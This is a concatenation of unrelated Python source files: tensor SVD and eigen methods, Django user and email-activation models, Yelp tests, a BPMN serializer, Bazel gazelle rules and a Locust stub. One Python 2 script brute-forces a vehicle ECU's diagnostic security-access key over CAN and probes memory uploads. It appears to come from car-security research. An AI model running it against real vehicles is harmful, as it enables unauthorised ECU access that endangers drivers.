        a method, not a function. The original tensors are not modified.
        """
        # collections.abc holds Iterable on Python 3.3+; the bare
        # collections.Iterable alias was removed in Python 3.10.
        from collections.abc import Iterable
        # We want to deal with lists, not tuples or bare integers
        a,b = indices
        if isinstance(a, Iterable):
            a = list(a)
        else:
            a = [a]
        if isinstance(b, Iterable):
            b = list(b)
        else:
            b = [b]
        # Check that 1) the number of contracted indices for self and
        # other match and 2) that the indices are compatible, i.e. okay
        # to contract with each other. In addition raise a warning if
        # the dirs don't match.
        assert(len(a) == len(b))
        assert(all(itt.starmap(
            fct.partial(self.compatible_indices, other),
            zip(a, b))))
        if (self.dirs is not None and other.dirs is not None and
                not all(self.dirs[i] + other.dirs[j] == 0
                        for i,j in zip(a,b))):
            warnings.warn("dirs in dot do not match.")
        s_sum = a
        s_open = [i for i in range(len(self.shape)) if i not in a]
        o_sum = b
        o_open = [i for i in range(len(other.shape)) if i not in b]
        self, s_transposed_shape, s_transposed_qhape, s_transposed_dirs =\
                self.to_matrix(s_open, s_sum,
                               return_transposed_shape_data=True)
        other, o_transposed_shape, o_transposed_qhape, o_transposed_dirs =\
                other.to_matrix(o_sum, o_open,
                                return_transposed_shape_data=True)
        self = self.matrix_dot(other)
        del other
        l_dims = s_transposed_shape[:len(s_open)]
        r_dims = o_transposed_shape[len(o_sum):]
        try:
            l_qims = s_transposed_qhape[:len(s_open)]
            r_qims = o_transposed_qhape[len(o_sum):]
        except TypeError:
            # qhape data is None: the tensor carries no quantum numbers.
            l_qims = None
            r_qims = None
        try:
            l_dirs = s_transposed_dirs[:len(s_open)]
            r_dirs = o_transposed_dirs[len(o_sum):]
        except TypeError:
            l_dirs = None
            r_dirs = None
        self = self.from_matrix(l_dims, r_dims,
                                left_qims=l_qims, right_qims=r_qims,
                                left_dirs=l_dirs, right_dirs=r_dirs)
        return self

    def eig(self, a, b, *args, return_rel_err=False, **kwargs):
        """ Transpose indices a to be on one side of self, b on the
        other, and reshape self to a matrix. Then find the eigenvalues
        and eigenvectors of this matrix, and reshape the eigenvectors to
        have on the left side the indices that self had on its right
        side after transposing but before reshaping.

        If hermitian is True then the matrix that is formed after the
        reshape is assumed to be hermitian.

        Truncation works like with SVD.

        Output is S, U, [rel_err], where S is a vector of eigenvalues
        and U is a tensor such that the last index enumerates the
        eigenvectors of self in the sense that if u_i = U[...,i] then
        self.dot(u_i, (b, all_indices_of_u_i)) == S[i] * u_i. rel_err is
        relative error in truncation, only returned if return_rel_err is
        True.

        The above syntax is precisely correct only for Tensors. For
        AbelianTensors the idea is the same, but eigenvalues and vectors
        come with quantum numbers so the syntax is slightly different.
        See AbelianTensor.matrix_eig for more details about what
        precisely happens.

        The original tensor is not modified by this method.
        """
        from collections.abc import Iterable  # collections alias removed in 3.10
        if not isinstance(a, Iterable):
            a = (a,)
        if not isinstance(b, Iterable):
            b = (b,)
        self, transposed_shape, transposed_qhape, transposed_dirs\
                = self.to_matrix(a, b, return_transposed_shape_data=True)
        S, U, rel_err = self.matrix_eig(*args, **kwargs)
        del self
        U_dims = (transposed_shape[:len(a)], S.shape)
        if transposed_qhape is not None:
            U_qims = (transposed_qhape[:len(a)], S.qhape)
        else:
            U_qims = (None, None)
        if transposed_dirs is not None:
            U_dirs = (transposed_dirs[:len(a)], U.dirs[1:])
        else:
            U_dirs = (None, None)
        U = U.from_matrix(*U_dims,
                          left_qims=U_qims[0], right_qims=U_qims[1],
                          left_dirs=U_dirs[0], right_dirs=U_dirs[1])
        ret_val = (S, U)
        if return_rel_err:
            ret_val += (rel_err,)
        return ret_val

    def svd(self, a, b, *args, return_rel_err=False, **kwargs):
        """ Transpose indices a to be on one side of self, b on the
        other, and reshape self to a matrix. Then singular value
        decompose this matrix into U, S, V. Finally reshape the unitary
        matrices to tensors that have a new index coming from the SVD,
        for U as the last index and for V as the first, and U to have
        indices a as its first indices and V to have indices b as its
        last indices.

        If eps>0 then the SVD may be truncated if the relative Frobenius
        norm error can be kept below eps. For this purpose different
        dimensions to truncate to can be tried, and these dimensions
        should be listed in chis. If chis is None then the full range of
        possible dimensions is tried.

        If print_errors > 0 then the truncation error is printed.

        If return_rel_err is True then the relative truncation error is
        also returned.

        Output is U, S, V, and possibly rel_err. Here S is a vector of
        singular values and U and V are isometric tensors (unitary if
        the matrix that is SVDed is square and there is no truncation).
        U . diag(S) . V = self, up to truncation errors.

        The original tensor is not modified by this method.
        """
        from collections.abc import Iterable  # collections alias removed in 3.10
        if not isinstance(a, Iterable):
            a = (a,)
        if not isinstance(b, Iterable):
            b = (b,)
        self, transposed_shape, transposed_qhape, transposed_dirs =\
                self.to_matrix(a, b, return_transposed_shape_data=True)
        U, S, V, rel_err = self.matrix_svd(*args, **kwargs)
        del self
        U_dims = (transposed_shape[:len(a)], S.shape)
        V_dims = (S.shape, transposed_shape[len(a):])
        if transposed_qhape is not None:
            U_qims = (transposed_qhape[:len(a)], S.qhape)
            V_qims = (S.qhape, transposed_qhape[len(a):])
        else:
            U_qims = (None, None)
            V_qims = (None, None)
        if transposed_dirs is not None:
            U_dirs = (transposed_dirs[:len(a)], U.dirs[1:])
            V_dirs = (V.dirs[:1], transposed_dirs[len(a):])
        else:
            U_dirs = (None, None)
            V_dirs = (None, None)
        U = U.from_matrix(*U_dims,
                          left_qims=U_qims[0], right_qims=U_qims[1],
                          left_dirs=U_dirs[0], right_dirs=U_dirs[1])
        V = V.from_matrix(*V_dims,
                          left_qims=V_qims[0], right_qims=V_qims[1],
                          left_dirs=V_dirs[0], right_dirs=V_dirs[1])
        ret_val = (U, S, V)
        if return_rel_err:
            ret_val += (rel_err,)
        return ret_val

    def matrix_decomp_format_chis(self, chis, eps):
        """ A common function for formatting the truncation parameters
        of SVD and eig. This is meant to be called by the matrix_svd and
        matrix_eig functions of subclasses.
        """
        if chis is None:
            min_dim = min(type(self).flatten_dim(self.shape[i])
                          for i in range(len(self.shape))) + 1
            if eps > 0:
                chis = tuple(range(min_dim))
            else:
                chis = [min_dim]
        else:
            try:
                chis = tuple(chis)
            except TypeError:
                chis = [chis]
            if eps == 0:
                chis = [max(chis)]
            else:
                chis = sorted(chis)
        return chis

    def split(self, a, b, *args, return_rel_err=False,
              return_sings=False, weight="both", **kwargs):
        """ Split with SVD. Like SVD, but takes the square root of the
        singular values and multiplies both unitaries with it, so that
        the tensor is split into two parts. Values are returned as
        (US, {S}, SV, {rel_err}),
        where the ones in curly brackets are only returned if the
        corresponding arguments are True.

        The distribution of sqrt(S) onto the two sides can be changed
        with the keyword argument weight. If weight="left"
        (correspondingly "right") then S is multiplied into U
        (correspondingly V). By default weight="both".
        """
        svd_result = self.svd(a, b, *args, return_rel_err=return_rel_err,
                              **kwargs)
        U, S, V = svd_result[0:3]
        weight = weight.strip().lower()
        if weight in ("both", "split", "center", "centre", "c", "middle", "m"):
            S_sqrt = S.sqrt()
            U = U.multiply_diag(S_sqrt, -1, direction="right")
            V = V.multiply_diag(S_sqrt, 0, direction="left")
        elif weight in ("left", "l", "a", "u"):
            U = U.multiply_diag(S, -1, direction="right")
        elif weight in ("right", "r", "b", "v"):
            V = V.multiply_diag(S, 0, direction="left")
        else:
            raise ValueError("Unknown value for weight: {}".format(weight))
        if return_sings:
            ret_val = U, S, V
        else:
            ret_val = U, V
        if return_rel_err:
            ret_val += (svd_result[3],)
        return ret_val
| StarcoderdataPython |
1604409 | <gh_stars>1-10
# -*- coding: UTF-8 -*-
import io
import json
from tests.testing import resource_filename
from yelp.obj.business import Business
from yelp.obj.deal import Deal
from yelp.obj.location import Location
from yelp.obj.response_object import ResponseObject
class TestResponseObject(object):
    """Tests for ResponseObject field assignment and nested parsing."""

    @classmethod
    def setup_class(cls):
        # Load the shared business-response fixture once per class.
        with io.open(resource_filename('json/business_response.json')) as fh:
            cls.response = json.load(fh)

    def test_response_obj_sets_correct_fields(self):
        with io.open(resource_filename('json/test_response.json')) as fh:
            payload = json.load(fh)
        resp_obj = ResponseObject('{}')
        resp_obj._fields = ['id', 'name']
        # Re-run __init__ so only the whitelisted fields are copied over.
        resp_obj.__init__(payload)
        assert resp_obj.id == payload['id']
        assert resp_obj.name == payload['name']
        assert hasattr(resp_obj, 'do_not_display') is False

    def test_response_obj_parse_list(self):
        resp_obj = ResponseObject('{}')
        resp_obj._parse('deals', Deal, self.response)
        assert len(resp_obj.deals) == len(self.response['deals'])
        assert type(resp_obj.deals[0]) is Deal

    def test_response_obj_parse_one(self):
        resp_obj = ResponseObject('{}')
        resp_obj._parse('location', Location, self.response)
        assert type(resp_obj.location) is Location

    def test_parse_main_response_body(self):
        resp_obj = ResponseObject('{}')
        resp_obj._parse_main_response_body('business', Business, self.response)
        assert type(resp_obj.business) is Business
| StarcoderdataPython |
179265 | import json
import matplotlib.pyplot as plt
from imantics import Dataset
if __name__ == '__main__':
    # Load a COCO-format annotation file and display every image with its
    # bounding boxes drawn on top (one matplotlib window per image).
    annotations_path = 'composition_dataset_2/train/annotations/annotations.json'
    with open(annotations_path) as fh:
        coco = json.load(fh)
    dataset = Dataset.from_coco(coco)
    for image in dataset.iter_images():
        rendered = image.draw(bbox=True)
        plt.imshow(rendered)
        plt.show()
| StarcoderdataPython |
159061 | <gh_stars>0
from datetime import timedelta
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models import Q
from django.db.models.signals import pre_save, post_save
from django.contrib.auth.models import (
AbstractBaseUser, BaseUserManager
)
from django.core.mail import send_mail
from django.template.loader import get_template
from django.utils import timezone
from ecommerce.utils import random_string_generator, unique_key_generator
# send_mail(subject, message, from_email, recipient_list, html_message)
DEFAULT_ACTIVATION_DAYS = getattr(settings, 'DEFAULT_ACTIVATION_DAYS', 7)
# Create your models here.
class UserManager(BaseUserManager):
    """Creation helpers for the email-keyed custom User model.

    NOTE(review): the published source contained anonymized
    ``password=<PASSWORD>`` placeholders, which are not valid Python;
    the defaults have been restored to ``None`` (the manager raises when
    no password is supplied anyway).
    """

    def create_user(self, email, full_name=None, password=None, is_active=True, is_staff=False, is_admin=False):
        """Create, hash the password for, and persist a user.

        Raises ValueError when email or password is missing.
        """
        if not email:
            raise ValueError("Users must have an email address")
        if not password:
            # BUG FIX: message previously read "must have a password address".
            raise ValueError("Users must have a password")
        user_obj = self.model(
            email=self.normalize_email(email),
            full_name=full_name,
        )
        user_obj.set_password(password)  # stores a salted hash, never plaintext
        user_obj.staff = is_staff
        user_obj.admin = is_admin
        user_obj.is_active = is_active
        user_obj.save(using=self._db)
        return user_obj

    def create_staffuser(self, email, full_name=None, password=None):
        """Shortcut: create a user with staff rights."""
        return self.create_user(
            email,
            full_name=full_name,
            password=password,
            is_staff=True,
        )

    def create_superuser(self, email, full_name=None, password=None):
        """Shortcut: create a user with staff and admin rights."""
        return self.create_user(
            email,
            full_name=full_name,
            password=password,
            is_staff=True,
            is_admin=True,
        )
class User(AbstractBaseUser):
    """Custom user model keyed on email instead of username."""
    # username = models.CharField()
    email = models.EmailField(max_length=255, unique=True)
    full_name = models.CharField(max_length=255, blank=True, null=True)
    # is_active is toggled True by EmailActivation.activate().
    is_active = models.BooleanField(default=True)
    # `staff` / `admin` are plain fields; the conventional is_staff/is_admin
    # names are exposed as read-only properties below.
    staff = models.BooleanField(default=False)
    admin = models.BooleanField(default=False)
    timestamp = models.DateTimeField(auto_now_add=True)
    # confirm = models.BooleanField(default=False)
    # confirmed_date = models.DateTimeField()
    USERNAME_FIELD = 'email' # could be username if we wanted to
    REQUIRED_FIELDS = [] # ['full_name'] # USERNAME_FIELD and password are required by default
    objects = UserManager()
    def __str__(self):
        return self.email
    def get_full_name(self):
        # Fall back to the email when no full name is stored.
        if self.full_name:
            return self.full_name
        return self.email
    def get_short_name(self):
        return self.email
    def has_perm(self, perm, obj=None):
        # Object-level permissions are not implemented: everyone passes.
        return True
    def has_module_perms(self, app_lable):
        # NOTE(review): parameter name "app_lable" is a typo for "app_label";
        # kept because Django calls this positionally and renaming would be
        # a gratuitous interface change.
        return True
    @property
    def is_staff(self):
        # Admins are implicitly staff.
        if self.is_admin:
            return True
        return self.staff
    @property
    def is_admin(self):
        return self.admin
class EmailActivationQuerySet(models.query.QuerySet): # EmailActiation.objects.all().confirmable()
    def confirmable(self):
        # An activation is confirmable when it is unused (not activated),
        # not revoked (not forced_expired), and was created within the last
        # DEFAULT_ACTIVATION_DAYS days.
        now = timezone.now()
        start_range = now - timedelta(days=DEFAULT_ACTIVATION_DAYS)
        # Rows created before start_range have expired.
        end_range = now
        return self.filter(
                activated = False,
                forced_expired = False
              ).filter(
                timestamp__gt = start_range,
                timestamp__lte = end_range
              )
class EmailActivationManager(models.Manager):
    """Manager exposing the confirmable() queryset shortcut."""
    def get_queryset(self):
        return EmailActivationQuerySet(self.model, using=self._db)
    def confirmable(self):
        # Pending, unexpired activations (see EmailActivationQuerySet).
        return self.get_queryset().confirmable()
    def email_exists(self, email):
        # Pending activations matching either the activation email or the
        # linked user's email.
        return self.get_queryset().filter(Q(email=email) | Q(user__email=email)).filter(activated=False)
class EmailActivation(models.Model):
    """One-time email confirmation key for a user account.

    The `key` is assigned lazily by the `pre_save_email_activation` signal
    handler; `activate()` flips the linked user to active and consumes the
    key.
    """
    user = models.ForeignKey(User)
    email = models.EmailField()
    key = models.CharField(max_length=120, blank=True, null=True)  # set by pre_save signal
    activated = models.BooleanField(default=False)
    forced_expired = models.BooleanField(default=False)
    expires = models.IntegerField(default=7) # 7 Days
    timestamp = models.DateTimeField(auto_now_add=True)
    update = models.DateTimeField(auto_now=True)

    objects = EmailActivationManager()

    def __str__(self):
        return self.email

    def can_activate(self):
        """True while this activation is pending and inside its time window."""
        qs = EmailActivation.objects.filter(pk=self.pk).confirmable()
        if qs.exists():
            return True
        return False

    def activate(self):
        """Activate the linked user and consume this key. Returns success."""
        if self.can_activate():
            # pre activation user signal
            user = self.user
            user.is_active = True
            user.save()
            # post signal for user just activated
            self.activated = True
            self.save()
            return True
        return False

    def regenerate(self):
        """Clear the key so the pre_save signal assigns a fresh one on save."""
        self.key = None
        self.save()
        # The pre_save hook repopulates self.key during save() above.
        if self.key is not None:
            return True
        return False

    def send_activation(self):
        """Email the activation link. Returns send_mail's result, or False
        when this activation is already used/revoked or has no key yet."""
        if not self.activated and not self.forced_expired:
            if self.key:
                base = getattr(settings, 'BASE_URL', 'https://127.0.0.1:8000')
                key_path = reverse('account:email-activate', kwargs={'key': self.key})
                path = '{base}{path}'.format(base=base, path=key_path)
                context = {
                    'path': path,
                    'email': self.email,
                }
                # BUG FIX: removed a dead `key = random_string_generator(size=45)`
                # assignment — the value was never used (the real key comes from
                # the pre_save signal).
                txt_ = get_template('registration/emails/verify.txt').render(context)
                html_ = get_template('registration/emails/verify.html').render(context)
                subject = '1-Click Email Verification'
                from_email = settings.DEFAULT_FROM_EMAIL
                recipient_list = [self.email]
                sent_mail = None
                print("account.models: sending email...")
                try:
                    sent_mail = send_mail(
                        subject,
                        txt_,
                        from_email,
                        recipient_list,
                        html_message=html_,
                        fail_silently=False
                    )
                except Exception as e:
                    print("account.models: exception!")
                    print(e)
                print("account.models: email sent")
                return sent_mail
        return False
def pre_save_email_activation(sender, instance, *args, **kwargs):
    # Assign a unique activation key just before saving, but only for
    # pending activations (not yet used or revoked) that have no key.
    if not instance.activated and not instance.forced_expired:
        if not instance.key:
            instance.key = unique_key_generator(instance)
pre_save.connect(pre_save_email_activation, sender=EmailActivation)
def post_save_user_create_receiver(sender, instance, created, *args, **kwargs):
    # When a brand-new User row is saved, create its EmailActivation and
    # immediately send the activation email.
    if created:
        obj = EmailActivation.objects.create(user=instance, email=instance.email)
        obj.send_activation()
post_save.connect(post_save_user_create_receiver, sender=User)
class Profile(models.Model):
    """Placeholder one-to-one extension of User for future profile fields."""
    user = models.OneToOneField(User)
    # extra fields
class GuestEmail(models.Model):
    """Email address captured for guest (not-logged-in) checkout flows."""
    email = models.EmailField()
    active = models.BooleanField(default=True)
    update = models.DateTimeField(auto_now=True)
    timestamp = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        return self.email
| StarcoderdataPython |
35596 | from .NumpyDataset import NumpyDataset | StarcoderdataPython |
3287121 | <filename>src/simod/writers/model_serialization.py
import xml.etree.ElementTree as ET
import xmltodict as xtd
from simod.configuration import QBP_NAMESPACE_URI
from ..readers import bpmn_reader as br
def serialize_model(filename):
    """Extract the QBP process-simulation section of a BPMN file and reshape
    it into the plain-dict structure Simod uses internally.

    The function renames namespaced XML keys, flattens distribution
    parameters, and enriches elements/sequences with task names and
    gateway source/target ids taken from the BPMN graph.
    NOTE: the transformations below depend on the exact key order and
    nesting produced by xmltodict — do not reorder them.
    """
    bpmn = br.BpmnReader(filename)
    # task id -> human-readable task name, used to label elements later.
    tasks = {x['task_id']: x['task_name'] for x in bpmn.get_tasks_info()}
    seqs = bpmn.get_edges_info()
    ns = {'qbp': QBP_NAMESPACE_URI}
    tree = ET.parse(filename)
    root = tree.getroot()
    # Serialize only the qbp:processSimulationInfo subtree back to bytes.
    sim_model_xml = ET.tostring(root.find("qbp:processSimulationInfo",
                                          namespaces=ns))
    sim_model_xml = sim_model_xml.decode()
    # Collapse the full namespace URI to the short 'qbp' prefix before
    # handing the document to xmltodict.
    sim_model_xml = sim_model_xml.replace(ns['qbp'], 'qbp')
    sim_model_xml = bytes(sim_model_xml, 'utf-8')
    sim_model_xml = xtd.parse(sim_model_xml)
    info = "qbp:processSimulationInfo"
    # Flatten the arrival-rate distribution: rename the node and move the
    # XML attributes (@type/@arg1/@arg2/@mean) into dname/dparams.
    sim_model_xml[info]['arrival_rate'] = (
        sim_model_xml[info].pop('qbp:arrivalRateDistribution'))
    sim_model_xml[info]['arrival_rate']['dname'] = (
        sim_model_xml[info]['arrival_rate'].pop('@type'))
    sim_model_xml[info]['arrival_rate']['dparams'] = dict()
    sim_model_xml[info]['arrival_rate']['dparams']['arg1'] = (
        sim_model_xml[info]['arrival_rate'].pop('@arg1'))
    sim_model_xml[info]['arrival_rate']['dparams']['arg2'] = (
        sim_model_xml[info]['arrival_rate'].pop('@arg2'))
    sim_model_xml[info]['arrival_rate']['dparams']['mean'] = (
        sim_model_xml[info]['arrival_rate'].pop('@mean'))
    sim_model_xml[info]['arrival_rate'].pop('qbp:timeUnit')
    # Unwrap the plural container nodes (qbp:elements -> elements_data etc.).
    tags = {'element': 'elements_data',
            'resource': 'resource_pool',
            'sequenceFlow': 'sequences',
            'timetable': 'time_table'}
    for k, v in tags.items():
        element = sim_model_xml[info]['qbp:' + k + 's']["qbp:" + k]
        sim_model_xml[info].pop('qbp:' + k + 's')
        sim_model_xml[info][v] = element
    sim_model_xml[info]['instances'] = (
        sim_model_xml[info].pop('@processInstances'))
    sim_model_xml[info]['start_time'] = (
        sim_model_xml[info].pop('@startDateTime'))
    sim_model_xml[info].pop('@currency')
    sim_model_xml[info].pop('@id')
    sim_model_xml[info].pop('@xmlns:qbp')
    # Promote the (now fully renamed) info dict to be the return value.
    element = sim_model_xml[info]
    sim_model_xml.pop(info)
    sim_model_xml = element
    # Flatten each task element's duration distribution and attach its
    # resource id and readable name.
    for element in sim_model_xml['elements_data']:
        element['elementid'] = element.pop('@elementId')
        element['id'] = element.pop('@id')
        element['arg1'] = element['qbp:durationDistribution']['@arg1']
        element['arg2'] = element['qbp:durationDistribution']['@arg2']
        element['mean'] = element['qbp:durationDistribution']['@mean']
        element['type'] = element['qbp:durationDistribution']['@type']
        element['resource'] = element['qbp:resourceIds']['qbp:resourceId']
        element['name'] = tasks[element['elementid']]
        element.pop('qbp:durationDistribution')
        element.pop('qbp:resourceIds')
    # Attach gateway source/target ids to each sequence flow from the BPMN edges.
    for element in sim_model_xml['sequences']:
        element['elementid'] = element.pop('@elementId')
        element['prob'] = element.pop('@executionProbability')
        seq = list(filter(lambda x: x['sf_id'] == element['elementid'], seqs))[0]
        element['gatewayid'] = seq['source']
        element['out_path_id'] = seq['target']
    return sim_model_xml
| StarcoderdataPython |
93843 | <reponame>andrewraharjo/CAN-Bus-Hack_Prius_Focus
from PyEcom import *
from config import *
import time, struct, sys, binascii
def str_to_hexarr(val):
    """Return the ordinal (byte) value of each character of val, in order."""
    return [ord(ch) for ch in val]
def nbo_int_to_bytearr(dword):
    """Split a 32-bit value into four bytes, least-significant byte first.

    NOTE(review): despite the "nbo" (network byte order) name, the output is
    little-endian — the opposite of network order. Preserved as-is because
    the caller below relies on this ordering; confirm the intended meaning.
    """
    return [(dword >> shift) & 0xFF for shift in (0, 8, 16, 24)]
class EcuPart:
    # Describes one region of ECU memory: where to read it from, where to
    # write it back, and how many bytes it spans (length may be None).
    def __init__(self, address, write_address, length):
        self.address = address
        self.write_address = write_address
        self.length = length
if __name__ == "__main__":
    # Python 2 script: talks to a vehicle CAN bus through an ECOM USB adapter.
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1,35916)
    ECU = 0x750
    #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB
    # Brute-force loop over candidate one-byte keys; presumably a UDS
    # SecurityAccess (service 0x27) seed/key exchange — confirm against the
    # ECU spec. The guessed key variants are kept commented below.
    for i in range(0, 1000):
        ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40)
        #key = (ret[2] - 0xAB) & 0xFF
        #key = (~ret[2] + 1) & 0xFF
        key = i & 0xFF
        ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40)
        # 0x35 appears to be the expected (rejection) response byte; any other
        # value is treated as noteworthy and stops the scan.
        if ret[2] != 0x35:
            print "New Error: %d %d" % (key, i)
            break
    # Probe uploads of the same address range with different data-format bytes.
    ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001, 0x40)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001, 0x40)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001, 0x40)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x22, 0x0000F000, 0x00000001, 0x40)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x12, 0x0000F000, 0x00000001, 0x40)
#Potential values for 34715300
#val = ecom.toyota_dword_to_targetdata(0xD2363456),
#val = ecom.toyota_dword_to_targetdata(0x0E5E5B29)
#val = ecom.toyota_dword_to_targetdata(0x6F8C9954)
#val = ecom.toyota_dword_to_targetdata(0x423659A8)
#val = ecom.toyota_targetdata_to_dword("42353B3C3A4A4948")
#print "34715100 %08X" % (val)
#T-0008-08.cuw
## val = ecom.toyota_targetdata_to_dword("443637373B3B384A")
## print "34702000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("443345463B3C484B")
## print "34702100 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("443A45453B3D4839")
## print "34702200 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("443A33493B3D4B4D")
## print "34705000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("443246363B463B49")
## print "34705100 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("444632463B473D4B")
## print "34705200 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("4231333A3A384B3E")
## print "34705300 %08X" % (val)
##
## #T-009-08.cuw
## val = ecom.toyota_targetdata_to_dword("4437483B3B483F3D")
## print "34709000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("424539363A363749")
## print "34710000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("423145393A38484C")
## print "34710100 %08X" % (val)
##
## #T-0052-11.cuw
## val = ecom.toyota_targetdata_to_dword("423438493A3E3E4D")
## print "34715000 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("42353B3C3A4A4948")
## print "34715100 %08X" % (val)
##
## val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D")
## print "34715200 %08X" % (val)
## print "CRC32: %08X" % (binascii.crc32("34715200") & 0xFFFFFFFF)
##
## #T-0053-11.cuw
## val = ecom.toyota_targetdata_to_dword("3042384539373E39")
## print "34728000 %08X" % (val)
##
## #T-0146-10
## val = ecom.toyota_targetdata_to_dword("3638393449353A37")
## print "F152647127 %08X" % (val)
## #print "CRC32: %08X" % (binascii.crc32("F152647127") & 0xFFFFFFFF)
##
## val = ecom.toyota_targetdata_to_dword("3638463749353839")
## print "F152647126 %08X" % (val)
## #print "CRC32: %08X" % (binascii.crc32("F152647126") & 0xFFFFFFFF)
##
## val = ecom.toyota_targetdata_to_dword("363846394935383C")
## print "F152647125 %08X" % (val)
## #print "CRC32: %08X" % (binascii.crc32("F152647125") & 0xFFFFFFFF)
##
## f = open("toyota_ecu.bin", "rb")
##
## num = 1
## total_blocks = []
##
## chunk = f.read(0x400)
## if chunk:
## hex_arr = str_to_hexarr(chunk)
## total_blocks += hex_arr
##
## #datalen = len(hex_arr)
## datalen = 0x400
##
##
## print "%04X" % (datalen)
##
## datalen = datalen & 0x0FFF
## data_bytes = (0x01000 | datalen) & 0x0FFFF
## byteone = (data_bytes >> 8)
## bytetwo = data_bytes & 0xFF
##
## print "%02X %02X" % (byteone, bytetwo)
##
## #print "[%d] -> Len: %d" % (num, len(hex_arr))
## #print hex_arr
## num += 1
##
## print "Total: %X" % (len(total_blocks))
##
## vindex = 0
## cnt = 0
## chunks = len(total_blocks) / 0x100
##
##
## for i in range(0, chunks):
## print "Count: %d" % (cnt)
##
## tmp = total_blocks[vindex:vindex+0x100]
## vindex += 0x100
## cnt += 1
## for asdf in tmp:
## sys.stdout.write("%02X " % (asdf))
##
## ecu1 = EcuPart(0x00000000, 0xFF000000, 0x1000)
## ecu2 = EcuPart(0xF7000100, 0xFF001000, None)
##
##
## addrs = [0x00000000, 0xF7000100]
## write_addrs = [0xFF000000, 0xFF001000]
##
## lens = {}
## lens[addrs[0]] = 0x1000
##
## addr_arr = nbo_int_to_bytearr(write_addrs[0])
## print hex(addr_arr[0])
## print hex(addr_arr[1])
## print hex(addr_arr[2])
## print hex(addr_arr[3])
##
## f.close()
| StarcoderdataPython |
3357096 | # Copyright 2016 The Bazel Go Rules Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Shell template for the generated runner: resolve the real workspace root
# (the WORKSPACE runfile is a symlink), cd there, then invoke the bundled
# gazelle binary with the precomputed args plus any user-supplied ones.
_script_content = """
BASE=$(pwd)
WORKSPACE=$(dirname $(readlink WORKSPACE))
cd "$WORKSPACE"
$BASE/{gazelle} {args} $@
"""
def _gazelle_script_impl(ctx):
    # Rule implementation: emit a bash script that runs gazelle in the
    # caller's workspace with flags assembled from the rule attributes.
    # Explicit prefix wins; otherwise read the repo-wide //:go_prefix value.
    prefix = ctx.attr.prefix if ctx.attr.prefix else ctx.attr._go_prefix.go_prefix
    # Command line: subcommand, user args, then the standard flags.
    args = [ctx.attr.command] + ctx.attr.args
    args += [
        "-repo_root", "$WORKSPACE",
        "-go_prefix", prefix,
        "-external", ctx.attr.external,
        "-mode", ctx.attr.mode,
    ]
    if ctx.attr.build_tags:
        args += ["-build_tags", ",".join(ctx.attr.build_tags)]
    script_content = _script_content.format(gazelle=ctx.file._gazelle.short_path, args=" ".join(args))
    script_file = ctx.new_file(ctx.label.name+".bash")
    ctx.file_action(output=script_file, executable=True, content=script_content)
    # The gazelle binary must travel along as a runfile of the script.
    return struct(
        files = depset([script_file]),
        runfiles = ctx.runfiles([ctx.file._gazelle])
    )
def _go_prefix_default(prefix):
    # When an explicit prefix string is supplied, no label default is needed;
    # otherwise fall back to the //:go_prefix target of the calling repository.
    if prefix:
        return None
    return Label("//:go_prefix", relative_to_caller_repository = True)
# Private rule generating the gazelle runner script; wrapped by gazelle() below.
_gazelle_script = rule(
    _gazelle_script_impl,
    attrs = {
        # "update" adds/updates rules; "fix" also rewrites deprecated usage.
        "command": attr.string(values=["update", "fix"], default="update"),
        # How gazelle emits changes: print to stdout, fix in place, or diff.
        "mode": attr.string(values=["print", "fix", "diff"], default="fix"),
        # Dependency resolution strategy for non-local imports.
        "external": attr.string(values=["external", "vendored"], default="external"),
        "build_tags": attr.string_list(),
        "args": attr.string_list(),
        "prefix": attr.string(),
        # The gazelle binary itself, shipped as a runfile of the script.
        "_gazelle": attr.label(
            default = Label("@io_bazel_rules_go//go/tools/gazelle/gazelle:gazelle"),
            allow_files = True,
            single_file = True,
            executable = True,
            cfg = "host"
        ),
        # Implicit fallback target for the Go import prefix (see _go_prefix_default).
        "_go_prefix": attr.label(default = _go_prefix_default),
    }
)
def gazelle(name, **kwargs):
    """Macro: create a runnable `bazel run //:name` target that invokes
    gazelle in the workspace. Generates the script via _gazelle_script and
    wraps it in an sh_binary; both targets are tagged manual so they are
    never built by wildcard patterns.
    """
    script_name = name+"_script"
    _gazelle_script(
        name = script_name,
        tags = ["manual"],
        **kwargs
    )
    native.sh_binary(
        name = name,
        srcs = [script_name],
        # Depending on //:WORKSPACE lets the script locate the workspace root.
        data = ["//:WORKSPACE"],
        tags = ["manual"],
    )
| StarcoderdataPython |
151031 | <filename>src/Core/DevOps/Locust/common/store_api.py<gh_stars>0
import random
import json
import uuid
import time
import requests
from locust.exception import RescheduleTask
class StoreApi:
    """Shopware store-api client used by Locust virtual users.

    Each instance models one storefront visitor: it owns a context token,
    picks a random currency/language from the sales channel, and issues
    *named* requests so Locust aggregates statistics per endpoint.
    """

    # NOTE(review): the annotation literally reads `None`; presumably this is
    # a context/config object (url, sales_channel, product_ids, category_ids,
